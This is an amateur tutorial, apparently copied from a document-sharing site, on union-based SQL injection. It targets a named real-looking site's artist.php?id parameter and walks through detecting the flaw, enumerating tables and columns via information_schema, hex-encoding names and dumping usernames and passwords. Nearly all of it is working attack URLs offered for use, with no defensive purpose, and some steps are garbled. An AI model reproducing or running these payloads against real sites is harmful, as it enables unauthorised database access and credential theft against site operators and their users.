Professional Documents
Culture Documents
SQL Injection Tutorial by Ralphmigcute From
SQL Injection Tutorial by Ralphmigcute From
net
Vulnerability
The sql injection will work only if the site is vulnerable to sql errors. ex: http://www. site.org/artist.php?id=74 = Vulnerable Why? Because if you put in the end of this link it will show up a error. Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in /home/bmocaorg/public_html/artist.php on line 12.
Union!
NOTE U MUST USE -- or /* at the end of the last number
In Order to know what is the number we will change we will do union You must put http://www. site.org/artist.php?id=put - here74 And you must use union then the number of columns http://www. site.org/artist.php?id=put - here74 union all select 1,2,3,4 -Example: 2 3 4 Then number will be in the site when the number show up Change one number to version() If the version is 5 and up. Go to the next page If the version is 4 and down skip the next page.
SQL Version 5
http://www.bmoca.org/artist.php?id=-74 union all select 1,version(),3,4-To check the tables http://www.bmoca.org/artist.php?id=-74 union all select 1,table_name,3,4 from information_schema.tables-The list of tables will be in the site If one table is shown use limit http://www.bmoca.org/artist.php?id=-74 union all select 1,table_name,3,4 from information_schema.tables limit 1,1-Continue increment until you find the one u are looking for. Then if you get the table you want you will need to check for the columns Change table_name to column_name Change information_schema.tables to information_schema.columns Then remove limit 1,1-Then add where table_name= Put the table name that you got in the table list but u must hex it
http://home2.paulschou.net/tools/xlate/ This tool is to convert string to hex If you choose users then the hex is 7573657273 Before you input the hex u must put 0x in the start so 0x7573657273
http://www.bmoca.org/artist.php?id=-74 union all select 1,column_name,3,4 from information_schema.columns where table_name=0x7573657273--
Then if you choose the column you want just do this to get the information: http://www.bmoca.org/artist.php?id=-74 union all select 1,concat_ws(0x3a,username,password),3,4 from users Change username , password to the column that you want then change users to the table you want. There you go. You got the user username and password
Credits to ralphmigcute